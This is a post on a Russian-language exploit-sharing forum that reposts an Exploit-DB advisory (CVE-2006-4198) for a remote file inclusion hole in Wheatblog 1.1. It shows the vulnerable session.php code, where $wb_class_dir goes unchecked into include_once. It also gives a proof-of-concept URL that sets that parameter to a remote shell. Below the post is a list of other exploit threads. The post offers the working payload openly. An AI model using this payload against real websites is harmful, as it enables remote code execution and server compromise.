Exploit Wheatblog 1.1 - 'session.php' Remote File Inclusion

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2174
Проверка EDB
  1. Пройдено
Автор
O.U.T.L.A.W
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-4198
Дата публикации
2006-08-11
Код: 
###########################################################################################
#                                   Aria-Security.net Advisory                            #
#                                 Discovered  by: O.U.T.L.A.W                             #
#                                < www.Aria-security.net >                                #
#                      Gr33t to: A.u.r.a  & l2odon & DrtRp & Sh3ll                        #              
###########################################################################################


<?php
include_once("$wb_class_dir/classDatabase.php");


function Start_Session()
{
    global $session_dir;

    if ( $session_dir != '' )
        session_save_path($session_dir);

    if ( ! isset($_SESSION) )
    {
        session_start();
        // Supposedly a fix for IE6
        header('Cache-control: private');
        My_Cache();

        if ( ! isset($_SESSION['db']) || gettype($_SESSION['db']->db) != 'resource')
            touchDatabaseSession();

    }
}


***********************************************************************

Proof of Concept:
server/includes/session.php?wb_class_dir=SHELL

Contact : [email protected]

# milw0rm.com [2006-08-11]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)
Ответы
0
Просмотры
771
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Sophos Web Appliance 4.3.1.1 - Session Fixation
Ответы
0
Просмотры
650
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active Session to polkit
Ответы
0
Просмотры
684
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Github Enterprise - Default Session Secret and Deserialization (Metasploit)
Ответы
0
Просмотры
649
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit FTPShell Client 6.53 - 'Session name' Local Buffer Overflow
Ответы
0
Просмотры
739
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)
Ответы
0
Просмотры
628
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows 10 - Browser Broker Cross Session Privilege Escalation
Ответы
0
Просмотры
654
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows 10 - SSPI Network Authentication Session 0 Privilege Escalation
Ответы
0
Просмотры
612
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows - CSRSS BaseSrvCheckVDM Session 0 Process Creation Privilege Escalation (MS16-048)
Ответы
0
Просмотры
487
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Aztech Modem Routers - Session Hijacking
Ответы
0
Просмотры
500
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу